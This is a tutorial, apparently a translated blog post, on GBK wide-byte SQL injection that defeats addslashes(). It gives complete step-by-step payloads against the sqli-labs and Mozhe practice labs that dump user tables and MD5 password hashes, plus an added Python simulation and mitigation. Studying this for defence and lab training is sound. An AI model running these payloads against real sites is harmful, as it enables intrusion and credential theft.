MySQL - wide byte injection

1. Function

addslashes() function:

Adds a backslash before certain predefined characters. The predefined characters are:

single quote ('), double quote ("), backslash (\), NUL (the null byte)

The function neutralizes these characters by putting a \ backslash in front of them. For example, a single quote '

becomes \' after being filtered by addslashes(). The escaped character no longer acts as a string delimiter.

When writing or querying the user name ' 1' ', the database recognizes the single quote ' as a closing symbol and requires a matching single quote to close it, which means it queries '1' and there is no way to query ' 1' '.

If you enter ' 1\' ', the \ makes the ' lose its closing function, so the database recognizes ' 1' '.

2. GBK encoding

We can bypass this by entering %df in front of the '.

Originally, if you input ?id=1', it is automatically escaped into ?id=1\', and the URL encoding of \ is %5c.

If you enter %df in front of it, the result becomes %df%5c, and %df%5c is parsed as a single character.

So where do %df and %5c come from?

%df is what we entered manually.

%5c is the \ that addslashes() automatically adds before the ' sign; the URL encoding of this \ is %5c.

When %df and %5c are put together, they conform to the GBK encoding method:

%df and %5c together form one Chinese character.

In this way, the \ loses its ability to escape the ' single quote.

Originally, this \ was there to escape our single quote.

For example, we originally wanted the ' to act as a closing quote, but the \ placed in front of it took that function away.

Now we manually add %df in front of the ' single quote. When addslashes() adds the \ symbol in front of our ' single quote, the encoding of that symbol is %5c, and this \ can no longer pair with the ' single quote. Instead, %df pairs with %5c.

So %df%5c become one character together, and the ' single quote is left on its own. This successfully bypasses the filter.

3. Wide byte bypass

Wide byte bypass preconditions:

The other party's encoding (the database connection) must also be GBK, and when the request is sent the client must also be declared as using GBK encoding.
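The mechanism from sections 2 and 3, as an added Python example that is not part of the original post: it simulates addslashes() byte by byte, shows what a GBK connection sees versus a UTF-8 one, and contrasts it with an escape applied after decoding in the connection charset. Assumed, not on the page: the charset name gbk stands for a connection that ran SET NAMES gbk, and the function names are mine.

```python
# Added example (not from the original post): byte-level simulation of why
# addslashes() fails under a GBK MySQL connection (assumed: SET NAMES gbk),
# plus a charset-aware escape that does not.
from urllib.parse import unquote_to_bytes

# addslashes() escapes exactly these four bytes, with no notion of charset.
ESCAPED = {0x27: b"\\'", 0x22: b'\\"', 0x5C: b"\\\\", 0x00: b"\\0"}

def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping like PHP's addslashes(): prefix ' " \\ and NUL with \\."""
    return b"".join(ESCAPED.get(b, bytes([b])) for b in data)

def server_view(url_value: str, charset: str) -> str:
    """What the SQL parser sees: URL-decode, addslashes, then decode as the
    connection charset (undecodable bytes are shown as U+FFFD)."""
    return addslashes(unquote_to_bytes(url_value)).decode(charset, errors="replace")

def quote_still_escaped(sql_fragment: str) -> bool:
    """Detection check: every ' must still be directly preceded by a backslash."""
    return all(i > 0 and sql_fragment[i - 1] == "\\"
               for i, ch in enumerate(sql_fragment) if ch == "'")

def escape_for_charset(data: bytes, charset: str) -> bytes:
    """Mitigation: decode with the connection charset first, escape on
    characters, then re-encode. A lone lead byte such as %df raises
    UnicodeDecodeError instead of swallowing the backslash that follows it."""
    text = data.decode(charset)
    for raw, esc in (("\\", "\\\\"), ("'", "\\'"), ('"', '\\"'), ("\x00", "\\0")):
        text = text.replace(raw, esc)
    return text.encode(charset)

def charset_escape_rejects(data: bytes, charset: str) -> bool:
    """True if escape_for_charset refuses the input as malformed for charset."""
    try:
        escape_for_charset(data, charset)
    except UnicodeDecodeError:
        return True
    return False

if __name__ == "__main__":
    payload = "1%df'"  # the ?id= value used in the post
    for cs in ("utf8", "gbk"):
        seen = server_view(payload, cs)
        print(f"{cs:5} sees {seen!r:14} quote escaped: {quote_still_escaped(seen)}")
    print("charset-aware escape rejects %df':", charset_escape_rejects(b"1\xdf'", "gbk"))
```

Under gbk the backslash disappears into a two-byte character and the quote is live; under utf8 the stray 0xdf byte decodes to U+FFFD and the quote stays escaped, which is why the precondition is that both sides use GBK.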

4. Case presentation 

(1) sqli-labs-master/Less-32

1. Determine the closing method and whether there is an injection point

?id=1%df' and 1=2 --+

?id=1%df') and 1=2 --+

?id=1%df" and 1=2 --+

?id=1%df") and 1=2 --+

Testing ?id=1%df' and 1=2 --+ makes the page report an error, which confirms that there is an injection point.

When we tested all the closing symbols, the page still did not echo.

Use %df to test for closure

url: ?id=1%df'

page error

''1�\'' LIMIT 0,1' at line 1

'1�\'' LIMIT 0,1

The closing method is therefore the single quotation mark.

url: ?id=1%df' --+

Use --+ to comment out the rest of the query.

The page echoes normally.

url: ?id=1%df' and 1=1--+

Using and 1=1, the page echoes normally.

url: ?id=1%df' and 1=2 --+

Using and 1=2, the page reports an error, which confirms that there is an injection point.

2. Determine the number of fields

?id=1%df' order by 3--+

url: ?id=1%df' order by 4--+

When order by 4 is tested, the page reports an error.

url: ?id=1%df' order by 3 --+

When order by 3 is tested, the page echoes normally.

3. Determine the echo positions

?id=1%df' union select 1,2,3 --+

The fields echoed on the page are 2 and 3.

4. Get the database name

?id=-1%df' union select 1,(database()),3--+

The database name is security.

5. Get the data table name

?id=-1%df' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=database())--+

emails,referers,uagents,users

6. Get the fields (columns)

?id=-1%df' union select 1,2,(select group_concat(column_name)from information_Schema.columns where table_schema=database() and table_name=0x7573657273)--+

Note: 0x represents hexadecimal. In normal tests we usually write table_name='users',

but here addslashes() also escapes the two single quotes we enter, so we convert the table name into hexadecimal and prefix it with the fixed 0x notation.

0x: represents hexadecimal

7573657273: represents users

Fields (columns) returned: id, username, password

The conversion was done with an online hex-to-character tool (hex / gb2312 / gbk / utf8 Chinese character internal code conversion, The X Online Tool).

7. Dump the data

?id=-1%df' union select 1,2,(select group_concat(username,0x7e,password)from security.users)--+

0x: represents hexadecimal

7e: the ~ character

The 0x7e here is just the separator we splice between username and password.

(2) Mozhe range (wide byte injection)

1. Determine the closing method and judge whether there is an injection point

?id=1%df' and 1=2 --+

url: ?id=1%df' and 1=1 --+

The page echoes normally.

?id=1%df' and 1=2--+

page error

This confirms there is an injection point.

2. Determine the number of fields

?id=1%df' order by 5 --+

url: ?id=1%df' order by 5 --+

The page echoes normally.

url: ?id=1%df' order by 6 --+

page error

So there are 5 fields in total.

3. Determine the echo positions

?id=-1%df' union select 1,2,3,4,5 --+

The echoed fields are 3 and 5.

4. Get the database name

?id=-1%df' union select 1,2,3,4,(database())--+

url: ?id=-1%df' union select 1,2,3,4,(database()) --+

The current database is

mozhe_discuz_stormgroup

5. Get the data tables

?id=-1%df' union select 1,2,3,4,(select group_concat(table_name)from  information_schema.tables where table_Schema=database())--+

The current data tables are

notice,stormgroup_member

6. Get the field (column) information

?id=-1%df' union select 1,2,3,4,(select group_concat(column_name)from  information_schema.columns where table_schema=database() and table_name=0x73746F726D67726F75705F6D656D626572 )--+

0x: represents the fixed hexadecimal notation

73746F726D67726F75705F6D656D626572: stormgroup_member

Note that whether it is the sqli-labs test above or the test here, when you convert the table name to hexadecimal you convert the bare table name, without double quotes or single quotes.

Fields returned: name, password, status

7. Dump the data

?id=-1%df' union select 1,2,3,4,(select group_concat(name,0x7e,password)from mozhe_discuz_stormgroup.stormgroup_member)--+

0x: fixed hexadecimal notation

7e: ~

mozhe~3114b433dece9180717f2b7de56b28a3,

mozhe~aec5684b03c7c59a55bf958c2f3320e7

There are two accounts here, and the passwords are stored as MD5 hashes. Reverse the hashes and log in.


Source: blog.csdn.net/m0_72755466/article/details/130126921